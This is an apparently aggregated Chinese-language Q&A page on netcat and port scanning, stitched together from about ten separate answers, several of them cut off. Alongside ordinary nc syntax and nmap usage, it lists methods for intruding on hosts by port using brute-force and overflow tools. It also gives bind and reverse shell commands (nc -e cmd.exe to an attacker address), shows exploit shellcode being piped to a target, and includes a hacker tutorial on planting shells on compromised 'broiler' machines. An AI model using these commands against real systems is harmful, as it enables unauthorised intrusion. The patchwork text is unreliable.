nc伺服器如何掃描埠
1. 如何檢測遠程主機上的某個埠是否開啟
操作方法如下:
1.安裝telnet。
2.下面開始測試某個埠是否開啟。
3.在cmd下輸入start /min telnet 192.168.3.422121。
4.會出現一個窗口,是最小化的,等一會,如果窗口自動關閉了,說明埠是關閉的或主機
ping不通。
5.如果埠是開放的,會出現以下畫面:
2. 怎麼掃描埠啊入侵技術!
各種埠的入侵方法
1. 1433埠入侵
scanport.exe 查有1433的機器
sqlScanPas*.**e 進行字典暴破(字典是關鍵)
最後 SQLTool*.**e入侵
對sql的sp2及以下的系統,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本機埠 sqlhelloF.exe 入侵ip 1433 本機ip 本機埠
(以上反向的,測試成功)
sqlhelloz.exe 入侵ip 1433 (這個是正向連接)
2. 4899埠入侵
用4899過濾器.exe,掃描空口令的機器
3. 3899的入侵
對很早的機器,可以試試3389的溢出(win3389ex.exe)
對2000的機器,可以試試字典暴破。(tscrack.exe)
4. 80入侵
對sp3以前的機器,可以用webdav入侵;
對bbs論壇,可以試試上傳漏洞(upfile.exe或dvup_delphi.exe)
可以利用SQL進行注入。(啊D的注入軟體)。
5. serv-u入侵(21埠)
對5. 004及以下系統,可用溢出入侵。(serv5004.exe)
對5.1.0.0及以下系統,可用本地提升許可權。(servlocal.exe)
對serv-u的MD5加密密碼,可以用字典暴破。(crack.vbs)
輸入一個被serv-u加密的密碼(34位長),通過與字典檔(dict.txt)的比較,得到密碼
6. 554埠
用real554.exe入侵。
7. 6129埠
用DameWare6129.exe入侵。
8. 系統漏洞
利用135、445埠,用ms03026、ms03039、ms03049、ms04011漏洞,
進行溢出入侵。
9. 3127等埠
可以利用doom病毒開的埠,用nodoom.exe入侵。(可用mydoomscan.exe查)。
10. 其他入侵
利用shanlu的入侵軟體入侵(WINNTAutoAttack.exe)。
經典IPC$入侵
11.4779埠
s掃描器 加遠程式控制制任我行
3. linux nc命令詳解 Linux nc命令怎麼用
Linux中nc命令是一個功能強大的網路工具,全稱是netcat。
語法:
nc [-hlnruz][-g<網關...>][-G<指向器數目>][-i<延遲秒數>][-o<輸出文件>][-p<通信埠>][-s<來源位址>][-v...][-w<超時秒數>][主機名稱][通信埠...]
參數說明:
-g<網關> 設置路由器躍程通信網關,最丟哦可設置8個。
-G<指向器數目> 設置來源路由指向器,其數值為4的倍數。
-h 在線幫助。
-i<延遲秒數> 設置時間間隔,以便傳送信息及掃描通信埠。
-l 使用監聽模式,管控傳入的資料。
-n 直接使用IP地址,而不通過域名伺服器。
-o<輸出文件> 指定文件名稱,把往來傳輸的數據以16進制字碼傾倒成該文件保存。
-p<通信埠> 設置本地主機使用的通信埠。
-r 亂數指定本地與遠端主機的通信埠。
-s<來源位址> 設置本地主機送出數據包的IP地址。
-u 使用UDP傳輸協議。
-v 顯示指令執行過程。
-w<超時秒數> 設置等待連線的時間。
-z 使用0輸入/輸出模式,只在掃描通信埠時使用。
實例:
1、TCP埠掃描
# nc -v -z -w2 127.0.0.1 1-100
Connection to 127.0.0.1 22 port [tcp/ssh] succeeded!
Connection to 127.0.0.1 53 port [tcp/domain] succeeded!
Connection to 127.0.0.1 80 port [tcp/http] succeeded!
...
nc: connect to 127.0.0.1 port 100 (tcp) failed: Connection refused
2、從192.168.1.2拷貝文件到192.168.1.3
首先在接收端192.168.1.3上: nc -l 1234 > test.txt
然後在發送端192.168.1.2上: nc 192.168.1.3 < test.txt
注意:先運行接收端,指定一個埠為1234,文件為test.txt,再執行發送端,並且發送端必須存在同名的文件test.txt
3、傳輸目錄
從server1(192.168.16.233)拷貝nginx目錄內容到server2(192.168.48.47)上。需要先在server2上,用nc激活監聽,
server2上運行:# nc -l 1234 | tar xzv-
server1上運行:# tar czv- nginx | nc 192.168.48.47 1234
4、簡單聊天工具
在192.168.1.2上: nc -l 1234
在192.168.1.3上: nc 192.168.1.2 1234
這樣,雙方就可以相互交流了。使用ctrl+C(或D)退出
4. 如何在伺服器上進行埠掃描
看你掃的哪些埠了,如果你掃的445或者1433什麼的掃不到的原因可能是,人家屏蔽掉了這幾個埠!
5. nc如何使用
一、基本使用
想要連接到某處: nc [-options] hostname port[s] [ports] …
綁定埠等待連接: nc -l -p port [-options] [hostname] [port]
參數:
-e prog 程序重定向,一旦連接,就執行 [危險!!]
-g gateway source-routing hop point[s], up to 8
G num source-routing pointer: 4, 8, 12, …
-I secs 延時的間隔
-l 監聽模式,用於入站連接
-n 指定數字的IP地址,不能用hostname
-o file 記錄16進制的傳輸
-p port 本地埠號
-r 任意指定本地及遠程埠
-s addr 本地源地址
-t 以telnet的形式應答
-u UDP模式
-v 詳細輸出——用多個-v可得到更詳細的內容
-z 將輸入輸出關掉——用於掃描時
-w secs timeout的時間
二. 它的簡單使用方法
1.nc -l -p 80
監聽80埠
2.nc -l -p 80 >c:\log.dat
監聽80埠,並把信息記錄到log.dat
3.nc -v -l -p 80
監聽80埠,並顯示埠信息
4.nc -l -p 80 -t -e cmd.exe
監聽本地的80埠的入站信息,同時將cmd.exe重定向至80埠,當有人連接的時候,就讓cmd.exe以telnet的形式應答
5.nc -v ip port
掃描某ip的某個埠
6.nc -v -z ip port-port
掃描某ip的某埠到某埠
7.nc -v -z -u ip port-port
掃描某ip的某udp埠到某udp埠
7.掃描遠程主機
nc -nvv -w2 -z 192.168.x.x 80-445
掃描192.168.x.x的TCP 80到TCP445的所有埠
8.REMOTE主機綁定SHELL
nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe
綁定REMOTE主機的CMDSHELL在REMOTE主機的TCP5354埠
9.REMOTE主機綁定SHELL並反向連接
nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354
綁定REMOTE主機的CMDSHELL並反向連接到192.168.x.x的TCP5354埠
三.使用的例子
1. 計算機192.168.0.1運行:nc -v -n -p 99
計算機192.168.0.8運行:nc -e cmd.exe 192.168.0.1 99
這樣我們就獲得了192.168.0.8的一個shell
2.計算機192.168.0.1運行:nc -v -n 192.168.0.8 99
計算機192.168.0.8運行:nc -v -l -p 99 >d:\sc.exe
四.高級用法:
1.作攻擊程序用
格式1:type c:\exploit.txt|nc -nvv 192.168.x.x 80
格式2:nc -nvv 192.168.x.x 80 < c:\exploit.txt
連接到192.168.x.x的80埠,並在其管道中發送』c:\exploit.txt』的內容(兩種格式確有相同的效果, 真是有異曲同工之妙)
2.作蜜罐用
nc -L -p 80 > c:\log.txt
使用』-L』可以不停地監聽某一個埠,直到ctrl+c為止,同時把結果輸出到』c:\log.txt』中,如果把』>』 改為』>>』即可以追加日誌
3.作蜜罐用
nc -L -p 80 < c:\honeypot.txt
使用』-L』可以不停地監聽某一個埠,直到ctrl+c為止,並把』c:\honeypot.txt』的內容』送』入其 管道中
6. nc軟體怎麼設置可以快速搶占埠
NC.EXE是黑客常用工具。主要用法如下
1)連接到REMOTE主機,例子: 格式:nc -nvv 192.168.x.x 80 講解:連到192.168.x.x的TCP80埠
2)監聽LOCAL主機,例子: 格式:nc -l -p 80 講解:監聽本機的TCP80埠
3)掃描遠程主機,例子: 格式:nc -nvv -w2 -z 192.168.x.x 80-445 講解:掃描192.168.x.x的TCP80到TCP445的所有埠
4)REMOTE主機綁定SHELL,例子: 格式:nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe 講解:綁定REMOTE主機的CMDSHELL在REMOTE主機的TCP5354埠
5)REMOTE主機綁定SHELL並反向連接,例子: 格式:nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354 講解:綁定REMOTE主機的CMDSHELL並反向連接到192.168.x.x的TCP5354埠 以上為最基本的幾種用法(其實NC的用法還有很多, 當配合管道命令"|"與重定向命令"<"、">"等等命令功能更強大......)。
高級用法:
6)作攻擊程序用,例子: 格式1:type.exe c:\exploit.txt|nc -nvv 192.168.x.x 80 格式2:nc-nvv192.168.x.x80講解:連接到192.168.x.x的80埠,並在其管道中發送'c:\ex ploit.txt'的內容(兩種格式確有相同的效果, 真是有異曲同工之妙:P) 附:'c:\exploit.txt'為shellcode等
7. 查看遠程伺服器的某一埠是否開啟
工具/原料
nc
telnet
方法/步驟
1、首先埠分tcp、udp之分,所以同一個埠號還有tcp協議和udp協議之分。
2、最常見的工具是telnet,但是telnet使用的是tcp協議,換句話說telnet只能檢測tcp的這個埠打開了沒。
8. 如何檢測(遠程)主機上的某個埠是否開啟
1.安裝Telnet組件。轉到程序控制面板,然後轉到打開或關閉窗口功能,Telnet客戶端和Telnet伺服器勾選,從而安裝Telnet組件。
9. 如何掃描某一計算機開放的所有埠
掃描工具如nmap和masscan等,都是對所有埠進行探測發包,並且可回復的就認定為埠開啟,如果中間有網路設備,可以作為代理發包或回復,那麼也是認為埠開啟的。
例如,A掃描B主機,B主機未開放7777埠,但是A和B之間有防火牆代理,可以回復7777埠包,那A所掃描出的結果也是B主機開放了7777埠,要學會甄別。
如何掃描計算機開放埠,可用nmap工具,命令可以參考:nmap -sS -p 1-65535 --open 目標地址,前提是已安裝nmap工具,此工具可以在官網免費下載安裝。
相同功能的工具還有masscan,此工具不適宜在Windows主機使用,需要在linux主機安裝。masscan更傾向於大范圍快速掃描,最高支持每秒10萬包探測。
(9)nc伺服器如何掃描埠擴展閱讀:
nmap埠探測工具
nmap是一個網路連接端掃描軟體,用來掃描網上電腦開放的網路連接端。確定哪些服務運行在哪些連接端,並且推斷計算機運行哪個操作系統(這是亦稱 fingerprinting)。
它是網路管理員必用的軟體之一,以及用以評估網路系統安全。
正如大多數被用於網路安全的工具,nmap 也是不少黑客及駭客(又稱腳本小子)愛用的工具 。
系統管理員可以利用nmap來探測工作環境中未經批准使用的伺服器,但是黑客會利用nmap來搜集目標電腦的網路設定,從而計劃攻擊的方法。
Nmap 常被跟評估系統漏洞軟體Nessus混為一談。Nmap 以隱秘的手法,避開闖入檢測系統的監視,並盡可能不影響目標系統的日常操作。
參考來源:網路-nmap
10. NC怎麼用啊
NC使用教程
使用動畫可以提供給核心成員,菜鳥們也可向我索取
在黑客界混如果不知道什麼叫NC的話,那可真是白混了
今天教大家如何來使用NC
講四個命令
命令1:監聽命令
nc -l -p port
nc -l -p port > e:\log.dat
nc -l -v -p port
參數解釋:
-l:監聽埠,監聽入站信息
-p:後跟本地埠號
-v:顯示埠的信息,如果使用-vv的話,則會顯示埠更詳細的信息
提示:一般大家都愛用-vv
nc -l -p 80
這個很簡單,監聽80埠
如果機器上運行這個命令,埠80被認為是開放的,可以欺騙很多掃描器的哦!
nc -l -p 80 > e:\log.dat
呵呵,功能和上邊一樣,但是後邊加了個「> e:\log.dat」我想,學過ECHO
那個命令的人都會知道吧,是在E盤創建一個log.dat的日誌文件
nc -l -v -p 80
和上邊命令相似,不過這次不是記錄在文件里,而是會直接顯示在運行著NC
的屏幕上。
呵呵,講了這么多,來實踐下
nc -l -v -p 80
然後在瀏覽器中輸入本機IP:127.0.0.1
呵呵,看到什麼?
同樣,上邊兩個也是一樣,大家自己試驗一下吧
命令2:程序定向
nc -l -p port -t -e cmd.exe
本地機: nc -l -p port 或 nc -l -v -p port
目標機:nc -e cmd.exe ip port
參數解釋:
-l、-p兩個參數已經解釋過了
-e;作用就是程序定向
-t:以telnet的形式來應答
例子
nc -l -p 5277 -t -e cmd.exe
知道運行在哪裡嗎?千萬不要運行在自己的機器上,如果運行了,你機器
就會變成一台TELNET的伺服器了,呵呵,解釋一下:監聽本地埠5277的
入站信息,同時將CMD.exe這個程序,重定向到埠5277上,當有人連接的時候,就讓程序CMD.exe以TELNET的形式來響應連接要求。
說白了,其實就是讓他成為一台TELNET的肉雞,所以這個命令要運行在你的肉雞上。。(話外音:說這么多遍當我們白痴啊,快往下講!!!)
呵呵,咱們來找台肉雞試試,我TELNET IP 5277
HOHO~~如何?
local machine:nc -l -p port ( or nc -l -v -p port )
remote machine:nc -e cmd.exe ip port
大家知道灰鴿子和神偷吧,這兩款工具都是利用了反彈埠型的木馬,
什麼叫反彈埠?就是說,當對方中馬後,不用你主動和對方連接,也就是說
不用從你的client端向對方主機上運行的server端發送請求連接,而是對方主動來連接你
這樣就可以使很多防火牆失效,因為很多防火牆都不檢查出站請求的。
這里這兩個命令結合在一起後,於那兩款木馬可以說有異曲同工之效。為什麼?
咳!!聽我給你講啊!!(先交100000000RMB學費)哇,別殺我啊!!)
nc -l -p 5277 (堅聽本地5277埠)
同樣也可以用
nc -l -v -p 5277
運行在本地
然後在遠程機器上,想辦法運行
nc -e cmd.exe ip 5277
(你可別真的打「ip」在肉機上啊)要打,xxx.xxx.xxx.xxx這樣!!
呵呵,看看在本地機器上出現了什麼?
這樣就是反彈~~在本地機器上得到了一個SHELL
命令3:掃描埠
nc -v ip port
nc -v -z ip port-port
nc -v -z -u ip port-port
參數解釋:
-z:將輸入輸出關掉,在掃描時使用
nc -v ip port
這個命令是針對某一個埠進行掃描
例如:
nc -v ip 135
掃描遠程主機的135埠,這樣獲得了該埠的一些簡單信息,但是針對某些埠,我們還可以獲得更多的信息
例如:80埠
我們可以使用nc -v ip 80 然後使用get方法來獲得對方的WEB伺服器的信息
nc -v -z ip port-port
這個命令是用來掃描的一個命令,這個命令用於快速掃描TCP埠,而port-port則是指定了掃描的埠范圍
例如:
nc -v -z ip 1-200
可以看到我機器上的1-200的TCP埠的開放情況
nc -v -z -u ip port-port
這個命令比上個命令多了個-u,這個命令的作用仍然是掃描埠,只是多了一個-u的參數,是用來掃UDP埠的
例如:
nc -v -z -u ip 1-200
這個命令就會掃1-200的UDP埠
命令4:傳送文件(HOHO,I LIKE)
LOCAL MACHINE:nc -v -n ip port < x:\svr.exe
REMOTE MACHINE:nc -v -l -p port > y:\svr.exe
參數解釋:
-n:指定數字的IP地址
這兩個命令結合起來是用來傳送文件的
首先,在遠程機上運行命令:
nc -v -l -p 5277 > c:\pulist.exe
這個命令還記的嗎?呵呵,是不是和監聽命令有點類似,對,沒錯,這個是監聽5277埠
並把接受到的信息數據寫到c:\pulist.exe中
這時候在本地機上運行
nc -v -n ip 5277 < e:\hack\pulist.exe
這個命令的意思就是,從本地E盤跟目錄中讀取pulist.exe文件的內容,並把這些數據發送到ip的5277埠上
這樣遠程主機就會自動創建一個pulist.exe文件。。呵呵,你想到了嗎??
上邊是NC的比較常用的方法,希望通過這些,大家能發揮自己的想像力,創造出更多更精彩的命令來,
因為NC的用法不僅僅局限於這幾種而已哦!!對NC來說,只有想不到,沒有做不到的!!!